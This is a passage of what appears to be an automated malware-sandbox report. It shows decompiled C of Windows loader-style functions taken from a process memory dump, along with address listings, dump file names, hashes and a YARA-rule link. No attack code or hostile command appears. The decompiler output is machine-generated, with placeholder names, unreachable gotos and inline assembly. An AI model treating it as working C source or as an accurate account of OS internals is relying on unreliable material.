				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4b3d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04A56600(0x4b352d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4b37b9c; // 0x0
							_t281 = L04A64620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04A8F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4b37b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x4b37b8c; // 0xdc2b70
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04A62280(_t200, 0x4b384d8);
									_t277 =  *0x4b385f4; // 0xdc3060
									_t351 =  *0x4b385f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xdc2ff8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04A5FFB0(_t287, _t353, 0x4b384d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04A9CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04A56600(0x4b352d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04A57926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4b3b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04ACE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4b38472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4b3b218; // 0x0
														asm("ror edi, cl");
														 *0x4b3b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04A62280(_t250, 0x4b384d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04A83898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04A5FFB0(_t293, _t353, 0x4b384d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04A837F5(_t353, 0);
																}
																E04A80413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04A79B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04A702D6(_t174);
																}
																L04A677F0( *0x4b37b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04A7C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04A5EC7F(_t353);
										L04A719B8(_t287, 0, _t353, 0);
										_t200 = E04A4F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04A8B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4b3b2f8; // 0xf20000
									if((_t206 |  *0x4b3b2fc) == 0 || ( *0x4b3b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4b3b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04AF6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04AF6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04A5E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04A5EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04A89730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04A5E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04A58F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04A83C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x04a5d5f2
0x04a5d5f5
0x04a5d5f5
0x04a5d5fd
0x04a5d600
0x04a5d60a
0x04a5d60d
0x04a5d617
0x04a5d61d
0x04a5d627
0x04a5d62e
0x04a5d911
0x04a5d913
0x00000000
0x04a5d919
0x04a5d919
0x04a5d919
0x04a5d634
0x04a5d634
0x04a5d634
0x04a5d634
0x04a5d640
0x04a5d8bf
0x00000000
0x04a5d646
0x04a5d646
0x04a5d64d
0x04a5d652
0x04aab2fc
0x04aab2fc
0x04aab302
0x04aab33b
0x04aab341
0x00000000
0x04aab304
0x04aab304
0x04aab319
0x04aab31e
0x04aab324
0x04aab326
0x04aab332
0x04aab347
0x04aab34c
0x04aab351
0x04aab35a
0x00000000
0x04aab328
0x04aab328
0x00000000
0x04aab328
0x04aab326
0x04a5d658
0x04a5d658
0x04a5d65b
0x04a5d665
0x00000000
0x04a5d66b
0x04a5d66b
0x04a5d66b
0x04a5d66b
0x04a5d66d
0x04a5d672
0x04a5d67a
0x00000000
0x00000000
0x04a5d680
0x04a5d686
0x04a5d8ce
0x04a5d8d4
0x04a5d8dd
0x04a5d8e0
0x04a5d68c
0x04a5d691
0x04a5d69d
0x04a5d6a2
0x04a5d6a7
0x04a5d6b0
0x04a5d6b5
0x04a5d6e0
0x04a5d6b7
0x04a5d6b7
0x04a5d6b9
0x04a5d6b9
0x04a5d6bb
0x04a5d6bd
0x04a5d6ce
0x04a5d6d0
0x04a5d6d2
0x04aab363
0x04aab365
0x00000000
0x04aab36b
0x00000000
0x04aab36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04a5d6bf
0x04a5d6bf
0x04a5d6e5
0x04a5d6e7
0x04a5d6e9
0x04a5d6ec
0x04a5d6ec
0x04a5d6ef
0x04a5d6f5
0x04a5d6f9
0x04a5d6fb
0x04a5d6fd
0x04a5d701
0x04a5d703
0x04a5d70a
0x04a5d70a
0x04a5d701
0x04a5d710
0x04a5d710
0x04a5d6c1
0x04a5d6c1
0x04a5d6c6
0x04aab36d
0x04aab36f
0x00000000
0x04aab375
0x04aab375
0x04aab375
0x00000000
0x04aab375
0x00000000
0x04a5d6cc
0x04a5d6d8
0x04a5d6d8
0x04a5d6d8
0x00000000
0x04a5d6c6
0x04a5d6bf
0x00000000
0x04a5d6da
0x04a5d6da
0x04a5d716
0x04a5d71b
0x04a5d720
0x04a5d726
0x04a5d726
0x04a5d72d
0x00000000
0x04a5d733
0x04a5d739
0x04a5d742
0x04a5d750
0x04a5d758
0x04a5d764
0x04a5d776
0x04a5d77a
0x04a5d783
0x04a5d928
0x04a5d92c
0x04a5d93d
0x04a5d944
0x04a5d94f
0x04a5d954
0x04a5d956
0x04a5d95f
0x04a5d961
0x04a5d973
0x04a5d973
0x04a5d956
0x04a5d944
0x04a5d92c
0x04a5d78b
0x04aab394
0x04a5d791
0x04a5d798
0x04aab3a3
0x04aab3bb
0x04aab3bb
0x04a5d7a5
0x04a5d866
0x04a5d870
0x04a5d884
0x04a5d892
0x04a5d898
0x04a5d89e
0x04a5d8a0
0x04a5d8a6
0x04a5d8ac
0x04a5d8ae
0x04a5d8b4
0x04a5d8b4
0x04a5d8ae
0x04a5d7a5
0x04a5d78b
0x04a5d7b1
0x04aab3c5
0x04aab3c5
0x04a5d7c3
0x04a5d7ca
0x04a5d7e5
0x04a5d7eb
0x04a5d8eb
0x04a5d8ed
0x00000000
0x04a5d8f3
0x04a5d8f3
0x04a5d8f3
0x00000000
0x04a5d8ed
0x04a5d7cc
0x04a5d7cc
0x04a5d7d2
0x00000000
0x04a5d7d4
0x04a5d7d4
0x04a5d7d7
0x04a5d7df
0x04aab3d4
0x04aab3d9
0x04aab3dc
0x04aab3dc
0x04aab3df
0x04aab3e2
0x04aab468
0x04aab46d
0x04aab46f
0x04aab46f
0x04aab475
0x04a5d8f8
0x04a5d8f9
0x04a5d8fd
0x04aab3e8
0x04aab3e8
0x04aab3eb
0x04aab3ed
0x00000000
0x04aab3ef
0x04aab3ef
0x04aab3f1
0x04aab3f4
0x04aab3fe
0x04aab404
0x04aab409
0x04aab40e
0x04aab410
0x04aab410
0x04aab414
0x04aab414
0x04aab41b
0x04aab420
0x04aab423
0x04aab425
0x04aab427
0x04aab42a
0x04aab42d
0x04aab42d
0x04aab42a
0x04aab432
0x04aab436
0x04aab438
0x04aab43b
0x04aab43b
0x04aab449
0x04aab44e
0x04aab454
0x04aab458
0x04aab458
0x04aab45d
0x00000000
0x04aab45d
0x04aab3ed
0x00000000
0x00000000
0x00000000
0x04a5d7df
0x04a5d7d2
0x04a5d7ca
0x04aab37c
0x04aab37e
0x04aab385
0x04aab38a
0x00000000
0x04aab38a
0x04a5d742
0x04a5d7f1
0x04a5d7f8
0x04aab49b
0x04aab49b
0x04a5d800
0x04a5d837
0x04a5d843
0x04a5d845
0x04a5d847
0x04a5d84a
0x04a5d84b
0x04a5d84e
0x04a5d857
0x04a5d802
0x04a5d802
0x04a5d80d
0x00000000
0x04a5d818
0x04a5d818
0x04a5d824
0x04a5d831
0x04aab4a5
0x04aab4ab
0x04aab4b3
0x04aab4b8
0x04aab4bb
0x00000000
0x04aab4c1
0x04aab4c1
0x04aab4c8
0x00000000
0x04aab4ce
0x04aab4d4
0x04aab4e1
0x04aab4e3
0x04aab4e5
0x00000000
0x04aab4eb
0x04aab4f0
0x04aab4f2
0x04a5dac9
0x04a5dacc
0x04a5dacf
0x04a5dad1
0x04a5dd78
0x04a5dd78
0x04a5dcf2
0x00000000
0x04a5dad7
0x04a5dad9
0x04a5dadb
0x00000000
0x00000000
0x04a5dae1
0x04a5dae1
0x04a5dae4
0x04a5dae6
0x04aab4f9
0x04aab4f9
0x04aab500
0x04a5daec
0x04a5daec
0x04a5daf5
0x04a5daf8
0x04a5dafb
0x04a5db03
0x04a5db11
0x04a5db16
0x04a5db19
0x04a5db1b
0x04aab52c
0x04aab531
0x04aab534
0x04a5db21
0x04a5db21
0x04a5db24
0x04a5dcd9
0x04a5dce2
0x04a5dce5
0x04a5dd6a
0x04a5dd6d
0x00000000
0x04a5dd73
0x04aab51a
0x04aab51c
0x04aab51f
0x04aab524
0x00000000
0x04aab524
0x04a5dce7
0x04a5dce7
0x04a5dce7
0x00000000
0x04a5dce7
0x00000000
0x04a5db2a
0x04a5db2c
0x04a5db31
0x04a5db33
0x04a5db36
0x04a5db39
0x04a5db3b
0x04a5db66
0x04a5db66
0x04a5db3d
0x04a5db3d
0x04a5db3e
0x04a5db46
0x04a5db47
0x04a5db49
0x04a5db4c
0x04a5db53
0x04a5db55
0x04a5db58
0x04a5db5a
0x04aab50a
0x04aab50f
0x04aab512
0x04a5db60
0x04a5db60
0x04a5db63
0x04a5db63
0x00000000
0x04a5db63
0x04a5db5a
0x04a5db3b
0x04a5db24
0x04a5db69
0x04a5db69
0x04a5db6c
0x04a5db6f
0x04a5db74
0x04aab557
0x04aab557
0x04aab55e
0x04a5db7a
0x04a5db7c
0x04a5db7f
0x04a5db82
0x04a5db85
0x00000000
0x04a5db8b
0x04a5db8b
0x04a5db8d
0x04a5db9b
0x04a5db9b
0x04a5db9d
0x04a5dba0
0x04a5dba2
0x04a5dba4
0x04a5dba7
0x04a5dba9
0x04a5dbae
0x04a5dbae
0x04a5dbb1
0x04a5dbb4
0x04a5dbb4
0x04a5dbb7
0x04a5dbba
0x04a5dcd2
0x04a5dcd4
0x00000000
0x04a5dbc0
0x04a5dbc0
0x04a5dbd2
0x04a5dbd7
0x04a5dbda
0x04a5dbdd
0x04a5dbdf
0x00000000
0x04a5dbe5
0x04a5dbe5
0x04a5dbee
0x04a5dbf1
0x04aab541
0x04aab544
0x00000000
0x04aab546
0x04aab546
0x00000000
0x04aab546
0x04a5dbf7
0x04a5dbf7
0x04a5dbfd
0x04a5dbfd
0x04a5dbff
0x04a5dc0b
0x04a5dc15
0x04a5dc1b
0x04a5dc1d
0x04a5dc21
0x04a5dc21
0x04a5dc23
0x04a5dc23
0x04a5dc26
0x04a5dc29
0x04a5dc2b
0x00000000
0x00000000
0x04a5dc31
0x04a5dc34
0x04a5dc36
0x04a5dcbf
0x04a5dcbf
0x04a5dcc2
0x00000000
0x04a5dc3c
0x04a5dc41
0x04a5dc43
0x00000000
0x04a5dc45
0x04a5dc45
0x04a5dc47
0x00000000
0x04a5dc4d
0x04a5dc4d
0x04a5dc50
0x04a5dc52
0x04a5dc55
0x04a5dcfa
0x04a5dcfe
0x04a5dd08
0x04a5dd0a
0x04a5dd0c
0x00000000
0x04a5dd12
0x04a5dd15
0x04a5dd2d
0x04a5dd2f
0x04a5dd32
0x04a5dd35
0x00000000
0x04a5dd35
0x04a5dc5b
0x04a5dc5b
0x04a5dc5e
0x04a5dc61
0x04a5dc64
0x04a5dc67
0x04a5dc67
0x04a5dc6a
0x04a5dc6c
0x04a5dc8e
0x04a5dc8e
0x04a5dc91
0x04a5dc93
0x04a5dcce
0x04a5dcce
0x04a5dc95
0x04a5dc9c
0x04a5dc6e
0x04a5dc72
0x04a5dc75
0x04a5dc77
0x04a5dc79
0x04aab551
0x04aab551
0x00000000
0x04a5dc7f
0x04a5dc7f
0x04a5dc81
0x00000000
0x04a5dc83
0x04a5dc86
0x04a5dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x04a5dc88
0x04a5dc81
0x04a5dc79
0x04a5dc6c
0x04a5dc55
0x04a5dc47
0x04a5dc43
0x00000000
0x04a5dc36
0x04a5dc23
0x00000000
0x04a5dbff
0x04a5dbf1
0x04a5dbdf
0x04a5db8f
0x04a5db92
0x04a5db95
0x00000000
0x00000000
0x00000000
0x00000000
0x04a5db95
0x04a5db8d
0x04a5db85
0x04a5db74
0x04a5dc9f
0x04a5dca2
0x04a5dcb0
0x04a5dcb0
0x04a5dad1
0x04aab4e5
0x04aab4c8
0x00000000
0x00000000
0x00000000
0x04a5d831
0x04a5d80d
0x00000000
0x04a5d800
0x04aab47f
0x04aab485
0x00000000
0x04aab485
0x04a5d665
0x04a5d652
0x00000000

Memory Dump Source

Source File: 00000005.00000002.777992864.0000000004A20000.00000040.00000001.sdmp, Offset: 04A20000, based on PE: true

Associated: 00000005.00000002.778441591.0000000004B3B000.00000040.00000001.sdmp Download File
Associated: 00000005.00000002.778452697.0000000004B3F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f16e0e9f8b7681e1d555cc97c5b68701fb823d55e1cb8678554a77382cac7e4a
Instruction ID: 20fc4f305753b04e48ed0f9641f6776ff3d2374e39e29c93c1b1fec295e066ef
Opcode Fuzzy Hash: f16e0e9f8b7681e1d555cc97c5b68701fb823d55e1cb8678554a77382cac7e4a
Instruction Fuzzy Hash: 7EE1C070A00359CFEB24DF29CA90BA9B7B1BF45308F048199DD099B6A1D734BD95CF61

Uniqueness

Uniqueness Score: -1.00%

Function 04A5849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04A5849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4b1f9c0);
				E04A9D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4b37b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04A5CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04A62280( *[fs:0x30], 0x4b38550);
						_t139 =  *0x4b37b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04A7F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04A5FFB0(_t193, _t235, 0x4b38550);
								L5:
								return E04A9D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04A41C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4b37b9c; // 0x0
							_t235 = L04A64620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4b37b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04A7A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04A5FFB0(_t193, _t235, 0x4b38550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04A677F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04A677F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4b37b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4b37b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
